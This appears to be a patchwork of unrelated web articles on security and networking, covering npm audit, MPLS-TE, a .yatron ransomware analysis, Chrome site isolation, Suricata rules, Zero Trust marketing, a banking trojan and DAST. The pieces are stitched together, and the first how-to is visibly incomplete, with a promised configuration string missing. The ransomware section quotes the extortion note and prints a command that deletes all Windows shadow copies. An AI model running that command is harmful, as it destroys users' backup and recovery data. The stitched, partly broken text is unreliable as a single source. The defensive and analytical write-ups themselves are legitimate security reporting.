The volume and sophistication of cyberattacks continue to overwhelm most organizations. A layered security approach can work if it is streamlined and modernized. AI and machine learning are leading technologies that help safeguard organizations, but security professionals still need to think beyond using AI for file-based malware attacks. Download the Forrester Market Overview: Endpoint Security Report Summary to learn how AI-driven solutions can be more effective than traditional signature-based AV.
When a user makes a request to an application, the X-Forwarded-For HTTP header stores the client IP. However, since edge nodes mediate requests to an edge application, the header also accumulates the other addresses along the request route in addition to the client IP address. To isolate the client IP, you must forward it to a new header by creating a rule in Rules Engine for Edge Application. To send the original client IP through a new request header, follow these steps:
- Access Real-Time Manager.
- On the top-left corner of the page, open the Products menu, represented by the three horizontal lines, and under the BUILD section, select Edge Application.
- Select the edge application you want to apply the solution to.
- Click the Rules Engine tab and select the Default Rule.
- In the Behavior section, click the + button.
- In the new behavior field, select Add Request Header.
- In the argument field, add the following string:
- Click the Save button.
After completing the alteration in Rules Engine, the IP address of the client that originated the request will be added to the new request header.
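For context on the parsing involved: X-Forwarded-For carries a comma-separated list in which the left-most entry is the original client and later entries are the intermediate hops. Here is a minimal sketch of that extraction logic (my own illustration, not the platform's implementation):

```python
# Illustrative sketch: X-Forwarded-For holds a comma-separated list in
# which the left-most entry is the original client and later entries
# are intermediate proxies added along the request route.
def client_ip(xff_value: str) -> str:
    """Return the original client address from an X-Forwarded-For value."""
    return xff_value.split(",")[0].strip()

print(client_ip("203.0.113.7, 10.0.0.2, 10.0.0.9"))  # -> 203.0.113.7
```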
Vulnerabilities can lie dormant and undetected throughout the application lifecycle, causing mayhem once an attacker discovers them. Attackers use both rudimentary and sophisticated techniques to exploit existing vulnerabilities within applications. Developers usually pay attention to the vulnerabilities present within the application code. However, the most common threats to applications are the vulnerabilities that third-party libraries bring in. Node.js implements the NPM audit function to address these issues when using third-party libraries within a project. This post will discuss how to treat NPM audit findings to ensure application security.

NPM audit is a command within the NPM CLI that allows developers to run vulnerability audits on the dependencies configured in a project. The NPM audit command evaluates each version of the dependencies against known vulnerable versions to determine whether the current dependencies used within the project are vulnerable. It also allows you to fix most findings from the NPM audit command automatically. However, it is essential to understand that updating specific libraries could break the application's behavior.

How to use the NPM audit command

Node.js makes it easy to use the NPM audit command by simplifying the operational and reporting aspects. As a result, developers don't require prior security-related training to run vulnerability audits against their projects. Use the following command to start the audit process; it displays the results of the audit on the CLI in an easy-to-read format.

npm audit

The following command switches the output format of the results to JSON, which can be useful for programmatic visualizations.

npm audit --json

Use the following option to filter the findings by severity.

npm audit --audit-level=critical

Also remember that, by default, installing an NPM package invokes the NPM audit command to ensure that no vulnerabilities are introduced during the installation of a new package.

NPM audit report components

The NPM audit report contains multiple components that allow you to obtain the information necessary to remediate the findings and understand each dependency's location. Each of these components indicates a particular aspect of the finding, so understanding them allows you to remediate vulnerabilities more effectively.

The severity of the finding takes into account the vulnerability's impact and exploitability in most everyday use cases. An NPM audit result can contain four levels of severity:
- Critical: Highest severity that requires immediate attention.
- High: These findings need developers to address them urgently.
- Moderate: These findings are of medium severity, and developers have more time to address them.
- Low: These findings are of the lowest severity, and developers can remediate them at their convenience.

The vulnerability description indicates the vulnerability affecting the current library version, for example, Denial of Service. The package name indicates the specific package the vulnerability resides in, so you can focus your remediation efforts on that particular package. The dependency field indicates the module of the package on which the vulnerability depends. The path indicates where the code that contains the specific vulnerability sits in the dependency tree.
This field usually contains a link to a security report with more information regarding the specific vulnerability.

Reading NPM audit results

Even though developers may not require specific security training to understand the NPM audit results, you do need to understand each component within the audit results to remediate each finding effectively. Read the specific fields of the findings to determine the right course of action. Focus on the findings with the highest severity and work your way down until all vulnerabilities within the project's dependencies are remediated.

Remediate NPM audit findings

NPM audit is not only a feature that audits project dependencies to uncover vulnerabilities; it also lets you fix each of the findings quickly. Security best practices dictate that developers employ a severity-based remediation effort to streamline the remediation of multiple findings. This means that findings with higher severities require prompt action, since they carry the most impact on the application.

Use the following command to automate the remediation process, remediating all possible vulnerabilities within all compatible packages and saving time and effort.

npm audit fix

However, note that this command only works when there are existing updates to the vulnerable packages identified during the audit. One of the common flags that helps developers is the "dry-run" flag. It allows you to run the fix command without implementing any fixes, so you can inspect the changes that NPM would make during automatic remediation before applying changes that might break the application.

npm audit fix --dry-run --json

If the fix requires moving to a major version upgrade, you must add the force flag to the command. However, upgrading to a major version could break the application, so this approach is not recommended.

npm audit fix --force

To remediate vulnerabilities within packages manually, use the npm install command to upgrade each package. This is the most common approach, since you can define the package and the specific version to which to upgrade.

npm install <package>@<version>

Exceptions that might stand out during a typical NPM audit are findings that currently have no fixes available. There may also be cases where NPM cannot automatically upgrade the packages, requiring manual intervention. In these specific cases, the NPM audit results will show additional details on remediating the identified vulnerabilities.

In this article, I have discussed how developers can treat NPM audit findings to ensure their applications are secure. These practices ensure that dependencies do not introduce vulnerabilities that could jeopardize the security of the application. I hope you have found this article helpful. Thank you for reading!
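As an illustration of how the JSON output can feed a programmatic workflow (my own sketch, not from the original article), the following Python script tallies findings by severity using the per-severity counters that recent npm versions include under metadata.vulnerabilities:

```python
# Minimal sketch: summarize `npm audit --json` output by severity.
# Assumes npm is on PATH and the working directory contains a lockfile.
import json
import subprocess

# npm audit exits non-zero when vulnerabilities exist, so don't use check=True.
proc = subprocess.run(["npm", "audit", "--json"], capture_output=True, text=True)
report = json.loads(proc.stdout)

# Recent npm versions report per-severity totals under metadata.vulnerabilities.
counts = report.get("metadata", {}).get("vulnerabilities", {})
for severity in ("critical", "high", "moderate", "low"):
    print(f"{severity:>8}: {counts.get(severity, 0)}")
```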
Segment Routing is gaining steam in the service provider community for its simplicity, especially as providers adopt SDN for centralized control. In this two-part blog series, I'll examine current and future methods of MPLS traffic engineering. In this first post, I explain MPLS Traffic Engineering (MPLS-TE) and Resource Reservation Protocol-TE (RSVP-TE), the technology widely in use today to implement traffic engineering. In part two, I'll cover Segment Routing.

MPLS Traffic Engineering:

As we all know, networks exist to deliver data packets between different endpoints. In a traditional IP-based network, data packets are forwarded on a per-hop basis. Each router between the source and destination does a route lookup and selects the lowest-cost path on which to forward packets. The disadvantage of this is that if a path is found to be optimal due to its low cost, every router in the network will tend to use that path to forward packets. This holds even when other underused but higher-cost paths are available. This approach to data transmission can cause performance issues such as packet drops or latency on the chosen path.

With Traffic Engineering (TE), rather than routing decisions being made at each hop, the headend (ingress) router determines the source-to-destination path for specific traffic. This way, traffic that would have taken an optimal but congested path may be directed through underused paths in the network, helping distribute bandwidth load across different links.

[Figure: MPLS TE network with TE tunnels (Cisco Press, MPLS Traffic Engineering)]

For TE to work, the network operator configures TE tunnels that use separate paths from a source to a destination edge router. Interior Gateway Protocols (IGPs) such as OSPF and IS-IS collect information about the network topology and the availability of resources, and advertise information about the links in the IGP domain to all the other routers within the network. This data helps the headend ingress router in the IP/MPLS network analyze the traffic patterns and the availability of resources across the links, and compute the best hop-by-hop path for the TE tunnels between different endpoints. A TE tunnel, in addition to bandwidth requirements, can also include Class of Service (CoS) requirements for the data to be forwarded through the tunnel. Once the TE tunnels are created and the bandwidth requirements of the traffic are understood, data is forwarded across the TE tunnel to its destination using MPLS label switching. In addition to helping with congestion avoidance on the primary link, Traffic Engineering also allows for failover when the primary path or tunnel between two endpoints fails, by providing Fast Reroute (FRR) on the TE tunnels.

Resource Reservation Protocol – Traffic Engineering (RSVP-TE):

Resource Reservation Protocol (RSVP) reserves resources along the end-to-end path of a traffic flow in an IP network. An RSVP request consists of a FlowSpec that specifies the Quality of Service (QoS) requirement for the traffic flow and a FilterSpec that defines which flow must receive the QoS priority. Once the necessary bandwidth is reserved along the path with RSVP, the application that made the request begins to transmit the traffic. RSVP is often used by real-time and multimedia applications to set up bandwidth reservations. The RSVP signaling protocol was extended with MPLS features to support MPLS TE, enabling RSVP to set up label-switched paths (LSPs) in an MPLS TE network.
With RSVP-TE, the headend router sends an RSVP PATH message that checks the availability of the requested resources on all the label switched routers (LSRs) in the path on which the TE tunnel is to be created. Upon receiving the PATH message, the tailend router in the path confirms the reservation with an RSVP RESERVATION message, which confirms the assignment of an LSP to a TE tunnel. This message is propagated upstream to the headend router through all the LSRs along the future TE tunnel path. After all the LSRs in the path accept and confirm the LSP, the MPLS TE LSP is operational. With this, the headend router can direct traffic through the new tunnels based on requirements, and your traffic-engineered MPLS network is ready.

In the next part, we will look at the new buzz in Traffic Engineering: Segment Routing.

For more information:
- Detailed steps in RSVP path reservation
- Instructions on configuring RSVP-TE on a Cisco ASR 9000

- Headend – The upstream, transmit end of a tunnel; the router that originates and maintains the traffic engineering LSP.
- LSP – Label-switched path; a sequence of hops (R0…Rn) in which a packet travels from R0 to Rn through label switching mechanisms. A label-switched path can be chosen dynamically, based on normal routing mechanisms, or through configuration.
- Tailend – The downstream, receive end of a tunnel; the router that terminates the traffic engineering LSP.

Glossary of additional terms: http://www.cisco.com/c/en/us/td/docs/ios/12_0s/feature/guide/fs_areat.html#wp1033446
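As an aside not in the original post, the contrast between per-hop lowest-cost forwarding and an operator-pinned TE path can be sketched in a few lines of Python (using the networkx library; the topology and costs here are invented):

```python
# Sketch: IGP-style lowest-cost routing vs. an operator-pinned TE path.
# Requires: pip install networkx
import networkx as nx

G = nx.Graph()
# A cheap direct path A-B-D and a pricier, underused path A-C-D.
G.add_edge("A", "B", cost=1)
G.add_edge("B", "D", cost=1)
G.add_edge("A", "C", cost=5)
G.add_edge("C", "D", cost=5)

# Per-hop lowest-cost routing: every flow from A to D converges here.
print(nx.shortest_path(G, "A", "D", weight="cost"))  # ['A', 'B', 'D']

# A TE tunnel lets the operator pin selected traffic to the underused,
# higher-cost path instead, spreading load across links.
te_tunnel_path = ["A", "C", "D"]
print(te_tunnel_path)
```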
The .yatron ransomware is a dangerous crypto virus that aims to encrypt sensitive user data. According to the available code analysis, it is a heavily modified version of the Hidden Tear family of threats. The released security reports indicate that the hacker group has likely taken the base code and modified it to produce a radically different version of the Hidden Tear ransomware family. One of the noteworthy features of this particular threat is that it uses two exploits that were patched long ago: EternalBlue and DoublePulsar. It can also be spread via the most common distribution techniques: phishing emails, dangerous payloads, and browser hijackers. As soon as the .yatron ransomware is delivered to the victims, its built-in sequence of commands will start. Depending on the exact configuration set by the hackers, it can launch various malicious actions such as the following:
- Information Gathering: Many data types can be extracted from the infected machines; they can identify either the victim users themselves or their machines. This is a very dangerous technique, as it can reveal personal information about the users, opening the possibility of financial abuse and identity theft crimes. The harvested machine information can be used to craft a unique ID assigned to each individual computer.
- Applications and Services Bypass: The collected information can be used to identify whether any security software is installed so that its engines can be bypassed. The list of potential targets includes anti-virus programs, sandbox environments, virtual machine hosts, etc.
- Windows Registry Changes: Some viruses can alter the values stored inside the Windows Registry. This can lead to severe performance issues, to the point of making the computer completely unusable until the threat is removed. As Registry values are used by applications to store valuable information, any modification can lead to unexpected errors and data loss.
- Boot Options Changes: The malware can modify the system's settings to automatically launch the virus engine as soon as the computer is powered on. This additionally blocks access to the recovery boot menus and certain services, rendering manual user removal guides non-working.
The .yatron ransomware infections can be configured to carry out all kinds of dangerous actions, including the delivery of other malware samples. Advanced .yatron ransomware samples can also be set to remove sensitive files from the affected computers: backups, system restore points, and shadow volume copies. As soon as all components have finished running, the actual encryption process will start. A strong algorithm and a built-in list of target file type extensions will be used to carry out this procedure. In the end, the .yatron extension will be applied to the victim files. The ransomware note is crafted in a text file which reads as follows:
Your personal files are encrypted By Yatron Oops ,Your Files Have Been Encrypted your important files are encrypted ! Your documents, photos, databases and Other personal files are encrypted ? the files that you looked for not readable ? We are the only ones who can decrypt your files Through the unique key. what should I do for decrypting my files?
If you want to recover your files, you must purchase a the unique key send 0.5 btc to the payment address : *** Send us your ID after your payment Email to contact us : [email protected] As proof you can email us 2 files to decrypt and we will send you the recover files to prove that we can decrypt your files you have 3 Days to pay or Your files will be deleted

Short Description: The ransomware encrypts files on your computer and demands that a ransom be paid to allegedly restore them.
Symptoms: The ransomware will blackmail the victims into paying a decryption fee. Sensitive user data may be encrypted by the ransomware code.
Distribution Method: Spam emails, email attachments.

.yatron Ransomware – What Does It Do?

.yatron Ransomware could spread its infection in various ways. A payload dropper which initiates the malicious script for this ransomware is being spread around the Internet. .yatron Ransomware might also distribute its payload file on social media and file-sharing services. Freeware found on the Web can be presented as helpful while also hiding the malicious script for the cryptovirus.

.yatron Ransomware is a cryptovirus that encrypts your files and shows a window with instructions on your computer screen. The extortionists want you to pay a ransom for the alleged restoration of your files. The main engine could make entries in the Windows Registry to achieve persistence and interfere with processes in Windows. As soon as all modules have finished running in their prescribed order, the lockscreen will launch an application frame which will prevent the users from interacting with their computers and will display the ransomware note to the victims.

You should NOT under any circumstances pay any ransom sum. Your files may not get recovered, and nobody can guarantee that they will.

The .yatron Ransomware cryptovirus could be set to erase all the Shadow Volume Copies from the Windows operating system with the help of the following command:

vssadmin.exe delete shadows /all /Quiet

If your computer was infected with this ransomware and your files are locked, read on to find out how you could potentially restore your files back to normal.

Remove .yatron Ransomware

If your computer system got infected with the .yatron files ransomware virus, you should have a bit of experience in removing malware. You should get rid of this ransomware as quickly as possible before it can spread further and infect other computers. Remove the ransomware by following the step-by-step instruction guide provided below.
Security is critical to Chrome, and many features protect Chrome users as they browse the web. Google Safe Browsing warns users away from websites known to be dangerous. Chrome’s sandbox and multi-process architecture provide additional layers of defense by helping block malware installation and reducing the severity of vulnerabilities. In Chrome 56, we’ve added yet another layer of defense by fully isolating Chrome extension privileges from web pages. Chrome has always kept extensions and web pages in different processes where possible, but sometimes extensions host web content in iframes. For example, an extension’s options page may include social network buttons or ads. Until recently, these web iframes ran inside the extension’s process. This is usually safe because security checks inside that process do not allow web iframes to use extension APIs. However, in rare cases malicious web iframes could exploit bugs to bypass these checks and use the same privileged APIs that are available to extensions, like chrome.history. Chrome now uses out-of-process iframes to ensure that extension-hosted web iframes are never put into their parent extension process. Even if an extension’s web iframe finds a Chrome bug and takes over its own web process, that process won’t have access to extension APIs. With this launch, web iframes in extension pages now run in a separate process from the extension, adding an extra layer of protection to privileged APIs. Introducing out-of-process iframes will greatly strengthen Chrome’s security model, though building them required a large change to Chrome’s architecture affecting systems like painting, input events, and navigation. This launch is just the first phase of our Site Isolation project, so stay tuned for even more security improvements that out-of-process iframes make possible.
HyBIS: Advanced introspection for effective Windows guest protection

Effectively protecting the Windows™ OS is a challenging task, since most implementation details are not publicly known. The Windows OS has always been the main target of malware that has exploited numerous bugs and vulnerabilities exposed by its implementations. Recent trusted boot and additional integrity checks have rendered the Windows OS less vulnerable to kernel-level rootkits. Nevertheless, guest Windows Virtual Machines are becoming an increasingly interesting attack target. In this work we introduce and analyze a novel Hypervisor-Based Introspection System (HyBIS) we developed for protecting Windows OSes from malware and rootkits. The HyBIS architecture is motivated and detailed, while targeted experimental results show its effectiveness. Comparison with related work highlights the main advantages of HyBIS, such as: effective semantic introspection, support for 64-bit architectures and for recent Windows versions (Windows 7 and later), and advanced malware disabling capabilities. We believe the research effort reported here will pave the way to further advances in the security of Windows™ OSes.
The optional merge filters are:
A specific filter is only active when the checkbox on its left side is selected:
● Only SIP: only the SIP messages and no other network traffic are kept in the merged output.
● Only this Date: only the packets on the specified Date are kept in the merged output.
● Only this Timeframe: only the packets between the Start and End time are kept in the merged output.
● Only these IP addresses: only the packets that belong to the list of the given network IP address ranges are kept in the merged output. How the IP address ranges can be entered is explained below.
● No syslog: no syslog packets are kept in the merged output.
The syntax of an IP address range is as follows:
<IP address> [/<network prefix>] [<separator>] [<IP address>] [/<network prefix>] [<separator>]
The brackets [ ] indicate an optional element.
<IP address> is any valid IPv4 address. See also https://en.wikipedia.org/wiki/IPv4
The / character introduces a network prefix (see next).
<network prefix> is a whole number ranging from 0 to 32. The given number indicates the netmask, where 0 stands for 0.0.0.0 (all IP addresses) and 32 stands for 255.255.255.255 (one single IP address). Omitting the network prefix assumes one single IP address (equivalent to /32).
<separator> can be a semicolon ; or a comma ,
Examples of "Only these IP addresses":
10.20.30.40 means only the single IP address 10.20.30.40
10.20.0.0 /16 means the network ranging from IP address 10.20.0.0 to IP address 10.20.255.255
10.0.0.0 /8 ; 172.16.0.0 /12 ; 192.168.0.0 /16 means the network ranges 10.0.0.0 - 10.255.255.255, 172.16.0.0 - 172.31.255.255 and 192.168.0.0 - 192.168.255.255.
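For readers who want to validate such range expressions programmatically, here is a small sketch (my own illustration, not part of the tool) that parses the documented syntax with Python's standard ipaddress module:

```python
# Sketch: parse range expressions such as
# "10.0.0.0 /8 ; 172.16.0.0 /12 ; 192.168.0.0 /16" and test membership.
import ipaddress
import re

def parse_ranges(expr: str):
    """Split on ';' or ',' and build IPv4 networks; a bare address means /32."""
    networks = []
    for part in re.split(r"[;,]", expr):
        part = part.strip().replace(" ", "")  # tolerate "10.0.0.0 /8"
        if not part:
            continue
        if "/" not in part:
            part += "/32"  # omitting the prefix means a single address
        networks.append(ipaddress.ip_network(part, strict=False))
    return networks

nets = parse_ranges("10.0.0.0 /8 ; 172.16.0.0 /12 ; 192.168.0.0 /16")
print(any(ipaddress.ip_address("172.20.1.5") in n for n in nets))  # True
```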
Hi Cybrarians, I recently integrated the Suricata tool into our application to block malicious traffic. Here are my 2 cents in this article on why Suricata is a great engine to install to mark your traffic prior to communicating with the world.

About Suricata

Suricata is a signature-based system built to perform Intrusion Detection, Prevention, and Network Monitoring, along with offline Pcap captures.

Installing Suricata on Ubuntu: https://linuxpitstop.com/install-suricata-ids-on-ubuntu-16-04/

To configure the Suricata engine, we need to tweak the suricata.yaml file. Once you have configured the engine, it's all about launching the engine and inspection.

Suricata Rule Set

Suricata has been integrated with the VRT ruleset and the Emerging Threats Suricata ruleset. However, we can write our own custom rules to block traffic based on malicious behavior, threats, or policy violations. Below is a sample rule which I have written to block all ICMP traffic.

drop icmp any any -> any any (msg:"DROP test ICMP ping from any network ";icode:0; itype:8; classtype:trojan-activity; sid:99999999; rev:1;)

Suricata has a capability for deep inspection: when the above rule is triggered, it inspects each ICMP packet for itype: 8 (Echo Request) and blocks the ICMP traffic. We can block traffic based on inspection of protocol parameters, contents, and ports, regardless of the type of traffic.

How is Suricata better than other IPS engines?
- It provides multithreading functionality, which is not available in traditional Snort-based IPS.
- The outputs can be integrated with dashboards such as Kibana and Logstash.
- We can even monitor TLS keys to check if there is any communication with less reputable CAs.

How to make Suricata work as an IPS engine

For Suricata to work in IPS mode, below was my workflow:
- Set up an IPsec tunnel between the client computer and the server using strongSwan.
- Using a strongSwan plugin, I was able to capture the source IP address.
- Python script: it fetches the source IP address and creates custom rules (a sketch of what this step might look like follows below).
- Python script: custom rules are loaded into Suricata, followed by a live reload.
- The client sends traffic to strongSwan.
- The Python script creates an NFQUEUE and forwards all the traffic to Suricata.
- Suricata, based on the custom rules, blocks the traffic that matches them.
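The post doesn't include the scripts themselves, so here is a minimal sketch of what the rule-generation step might look like (my own illustration; the rules file path and SID base are invented):

```python
# Sketch: generate a per-source-IP Suricata drop rule and append it to a
# custom rules file, after which Suricata's rules can be live-reloaded.
# RULES_FILE and SID_BASE are invented for illustration.
RULES_FILE = "/etc/suricata/rules/custom.rules"
SID_BASE = 9000000

def drop_rule(src_ip: str, sid: int) -> str:
    """Build a Suricata rule that drops all traffic from src_ip."""
    return (
        f'drop ip {src_ip} any -> any any '
        f'(msg:"DROP traffic from {src_ip}"; sid:{sid}; rev:1;)'
    )

def add_block(src_ip: str, sid: int = SID_BASE) -> None:
    with open(RULES_FILE, "a") as fh:
        fh.write(drop_rule(src_ip, sid) + "\n")

add_block("198.51.100.23")
# A live rule reload can then be triggered, e.g. via the unix socket client:
#   suricatasc -c reload-rules
```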
Complexity has outstripped legacy methods of cybersecurity, as there is no longer a single, easily identified perimeter for enterprises. As a result, security teams are shifting network defenses toward a more comprehensive IT security model to accommodate this new security climate. The Zero Trust approach enables organizations to restrict access controls to networks, applications, and environments without sacrificing performance and user experience. Simply stated, it's an approach that trusts no one. As more and more organizations leverage cloud computing, the traditional network security perimeter has all but vanished, and security teams are finding it difficult to identify who and what should be trusted with access to their networks. As a result, a growing number of organizations are considering adopting a Zero Trust network architecture as a key component of their enterprise security strategy.

What is a Zero Trust Architecture?

Perimeter network security focuses on keeping attackers out of the network. However, this traditional approach is vulnerable to users and devices inside the network. Traditional network security architecture leverages firewalls, access controls, intrusion prevention systems (IPSs), security information and event management tools (SIEMs), and email gateways, building multiple layers of security on the perimeter — layers that cyber attackers may have already learned to breach.

"Verify, then trust" security trusts users inside the network by default, so anyone with the right user credentials can potentially be admitted to the network's complete array of sites, apps, and devices. Zero Trust assumes the network has been compromised and challenges the user or device to prove that they present an acceptable risk level. It requires strict identity verification for every user and device attempting to access resources on a network, even if the user or device is already within the network perimeter. Zero Trust also provides the ability to limit access once anyone is inside the network, preventing an attacker from exploiting lateral freedom throughout an organization's infrastructure.

Recently, Zero Trust as a concept came into focus when U.S. President Joe Biden issued an executive order requiring agencies to have a plan to adopt a Zero Trust framework within 90 days. The order also provided clear recommendations and timeframes for public and private organizations to implement key technology and process improvements.

Zero Trust enables organizations to reduce risk to their cloud and container deployments while also improving governance and compliance. Organizations can gain insight into users and devices while identifying threats and maintaining control across the network. A Zero Trust approach can help identify business processes, data flows, users, data, and associated risks. The model helps to set policy rules that can be automatically updated based on associated risks.
Adopting Zero Trust enables organizations to increase their level of continuous verification, enabling them to detect intrusions and exploits quickly and to help stop attacks such as the following before they can succeed:
- Phishing emails targeting employees
- Lateral movement through the corporate network
- Redirecting a shell to a service to compromise a corporate machine
- Stolen developer passwords
- Stolen application database credentials
- Exfiltration of a database via a compromised application host
- Compromising an application host via a privileged workstation
- Using a developer password to elevate application host privileges
- Installing a keylogger via local privilege escalation on a workstation

Organizations seeking to implement a Zero Trust security framework must address the following:
- Identify Sensitive Data: Identify and prioritize data according to risk; know where it lives and who has access to it.
- Limit and Control Access: Establish limits on users, devices, apps, and processes seeking data access; a least-privilege access control model should be limited to a need-to-know basis.
- Detect Threats: Monitor all activity related to data access continuously, comparing current activity to baselines built on prior behavior and analytics; combining monitoring, behaviors, rules, and security analytics enhances the ability to detect internal and external threats.

A strong Zero Trust security model features the following principles:
- Authenticated access to all resources: Zero Trust views every attempt to access the network as a threat. While traditional security often requires nothing more than a single password to gain access, multi-factor authentication (MFA) requires users to enter a code sent to a separate device, such as a mobile phone, to verify they are in fact who they claim to be.
- Least-privilege controlled access: Allowing the least amount of access is a key principle of Zero Trust. The objective is to prevent unauthorized access to data and services and to make control and enforcement as granular as possible. Zero Trust networks grant access only when absolutely necessary, rigorously verifying requests to connect to systems and authenticating them beforehand. Constricting security perimeters into smaller zones that maintain distinct access to separate parts of the network limits lateral movement; segmented security becomes increasingly important as workloads become more mobile.
- Inspect and log activity using data security analytics: Continuously monitor, inspect, and log traffic and activities. User account baselines should be established to help automatically identify abnormal behaviors indicative of malicious activity.

Why Lookout Zero Trust?

Lookout Continuous Conditional Access (CCA) provides a modern approach to Zero Trust. With insights into endpoints, users, networks, apps, and data, Lookout provides unprecedented visibility to organizations, enabling them to effectively detect threats and anomalies, support compliance requirements, and stop breaches. From an endpoint perspective, CCA enables you to create policies that take into account typical threat indicators such as malicious apps, compromised devices, phishing attacks, app and device vulnerabilities, and risky apps. Our access platform monitors for anomalous user behavior such as large downloads, unusual access patterns, and unusual locations. And data loss prevention (DLP) indicates the risk sensitivity of what someone on the network might be attempting.
Leveraging device telemetry and advanced analytics, the platform enables organizations to respond efficiently and intelligently. You can restrict access to sensitive data, request step-up authentication, or take specific action on content, such as masking or redacting certain keywords, applying encryption and adding watermarks. In the event of a breach, you can shut down access altogether. With Lookout CCA, your organization is in complete control, protected from endpoint to cloud. That’s the key benefit of an integrated security and access platform. And it’s the way a modern Zero Trust architecture should be designed. To learn more about our endpoint-to-cloud solution, check out our SASE solution page.
As online platforms grow bigger every single day, online threats are keeping pace. With privacy and security concerns worldwide, the number of threats is unsurprisingly large. Cybercriminals are always up to something that can potentially harm you in different ways. Sometimes they aim for your personal data, including your address, passwords, name, bank account details, and other information. Now a new piece of malware is in the news, and it is quite a sneaky one that relies on a phishing technique. The malware gets into the system through a phishing mail: the victim opens the mail, which lets the malware in. Banking users are the main targets, putting their credit card details, passwords, and similar data at risk. Once the malware has entered the system through phishing, a zip file gets installed and it steals data from the user. The malware acts upon the browsers and stops them from auto-filling details during banking sessions, so the user has to enter the details or passwords manually. While the details are being filled in manually, the keylogger in the malware collects this data and steals it. The next thing you know, your details are sent to a server accessed by the attacker. This malware is called the Metamorfo Banking Trojan, and a campaign using it is targeting multiple banks: around 20 banks from different countries around the world are at risk. The US, Canada, Peru, Ecuador, Brazil, Mexico, and Chile are targeted by this campaign. The Trojan is as sneaky as it seems: once the phishing gets past the user, it makes a successful attack. Through phishing, this malware is sent as an invoice or an invitation to download some file. The malware can even slip past antivirus software during virus detection.
Stratosphere IPS [named "Stratoshere IPS" until 2016/10/01]

The Stratosphere IPS is a free-software Intrusion Prevention System that uses Machine Learning to detect and block known malicious behaviors in network traffic. The behaviors are learnt from highly verified malware and normal traffic connections in our research laboratory. Its goal is to provide the community, and especially vulnerable targets with low budgets such as NGOs and civil society groups, with an advanced tool that can protect against targeted attacks.
- The project's own website

The Stratosphere IPS project was born in the CTU University of Prague in the Czech Republic, as part of the PhD work of Sebastian García. The core of the Stratosphere IPS is a machine learning algorithm that analyzes individual network connections to extract their behavioral patterns. The patterns of known malicious connections are used to train the system and can subsequently be used to detect unknown traffic in new networks. The algorithms were publicly published, and the behavioral models are continually being verified by academic researchers.

Scanning your network is a very security- and privacy-sensitive matter. Because Stratosphere is published as free software, you do not have to trust it: you get to inspect every aspect of its inner workings and can freely improve upon it. It is already being used across the world, within multinationals, NGOs, and academia.

The design goal of the Stratosphere IPS is to develop a highly advanced and free network-based malicious-action detector that can help protect individuals, middle-size organizations, NGOs, and almost any type of network.

Agent Technology Center, CTU University of Prague
What is DAST (Dynamic Application Security Testing)?

Dynamic Application Security Testing (DAST) refers to a particular kind of application security testing (AppSec testing) in which the application under test is analyzed while it is running, but the testers have no access to the source code or knowledge of the application's internal interactions or design at the system level. This "black box" testing analyses the application from the outside in, analyses its operating state, and observes its reactions to simulated attacks made by a testing tool. The way an app reacts in these simulations can shed light on whether or not it is vulnerable to a real-world attack.

How Does DAST Work?

To test an application's susceptibility to attack, DAST systems seek out exposed input fields and then feed them a wide variety of unexpected or malicious data. These can range from standard attempts to exploit weaknesses like SQL injection commands and Cross-site Scripting (XSS) flaws to less prevalent inputs that may reveal problems with input validation and memory management. The DAST tool determines whether an application is vulnerable to a given attack vector by observing how it behaves in response to a series of inputs. There is a security hole if, for instance, a SQL injection attack grants unrestricted access to data, or if the application crashes because of invalid or corrupt input.

Why is DAST Important?

There is no chance that security vulnerabilities in applications are going away any time soon; this is where Application Security Testing comes in. CNBC found that over 75% of applications are vulnerable in some fashion. Developers often make simple security mistakes that have far-reaching consequences, such as failing to properly validate user input, disclosing the server's version, or relying on outdated or insecure software libraries. You may be wondering how DAST scanning is any different from the slow, static, and time-consuming methods of traditional penetration testing or static application security testing. DAST is different since it is always evolving: the tests are executed in real time to mimic how an actual application would function. Dynamic testing is typically carried out on a live system, also known as a production environment.

Types of DAST

While there are no recognized subtypes of DAST, security professionals classify DAST technologies into two informal groups: modern and legacy. Here are their primary differences:

Automation and integration: Older DAST applications were made for manual, on-demand scanning. Even though the scanning process is automated, the tool does not offer any additional automation and merely compiles and displays a list of DAST security flaws. State-of-the-art DAST solutions, by contrast, are typically activated by an automation server like Jenkins and are designed to operate invisibly as part of the SDLC, out of sight of the user. After a scan is complete, the results are uploaded to the developers' ticketing system.

Vulnerability confirmation/validation: Simple testing is all that is possible with legacy DAST tools, which consist of sending a request, receiving a response, and determining whether or not the response indicates a vulnerability. There are no other weakness-confirmation techniques provided.
Conversely, the requirement for manual validation by penetration testers or security engineers has been removed by contemporary DAST tools, which frequently carry out checks that confirm the vulnerability with 100% certainty and produce proof of exploitation.

Dynamic Application Security Testing: Advantages and Disadvantages

DAST has both benefits and drawbacks for scanning runtime applications. We'll detail the advantages and downsides of utilizing a DAST tool so you can decide if it's right for you.

- Technology-independent: DAST tools don't touch an app's source code, so they're compatible with any platform or language. A single DAST tool may therefore operate on all your applications, even if they're different but often interact. DAST tools are cost-effective and good for performing widespread security checks quickly.
- Finds configuration issues: DAST finds security vulnerabilities in fully functional applications. Because they look at your application from the outside, DAST scanners can find configuration issues that other security scanning tools may miss and can identify setup errors that aren't obvious from the code.
- Low rate of false positives: The OWASP Benchmark Project revealed that DAST tools have a lower-than-average number of false positives, making DAST scanners a reliable option for IT security teams.
- Good for penetration testing: By manually executing penetration testing with a DAST scanner, you can automate various penetration operations to examine how your system responds to intrusions and catches attack payloads. This benefit is strongly tied to operator skills, so security specialists or program managers will get the most out of it.

Although DAST has many benefits, it is not a one-stop shop for fixing all problems. DAST has a number of significant drawbacks, the most notable of which are:

- Late appearance in the SDLC: DAST requires access to a running program, so it is only conducted late in the Software Development Lifecycle (SDLC), when it is more costly to fix flaws.
- Vulnerability location: Although DAST solutions can determine that a vulnerability exists in an application, they are unable to pinpoint where the vulnerability is situated within the codebase, since they do not have access to the source code.
- Code coverage: Since DAST solutions analyze a live program, they can miss security flaws in unexercised areas of the code (due to incomplete code coverage).

Differences Between DAST and SAST

Dynamic application security testing (DAST) is distinct from its static counterpart in that it mimics an actual attack on the application. These attacks are carried out by a DAST scanner, which then looks for anomalies in the results to pinpoint potential security flaws. In contrast, static application security testing (SAST) examines an application's source code from the inside out, so the language and web framework must be supported by the SAST scanner. DAST scanners, instead, are external to the program and communicate with it over HTTP. Using both SAST and DAST is recommended for the greatest possible improvement in security. To resolve the tension between dynamic application security testing (DAST) and static application security testing (SAST), the grey-box approach of interactive application security testing (IAST) was established.

How And When to Use DAST?

DAST is helpful for monitoring web application security in real time and identifying server or database configuration errors that compromise security.
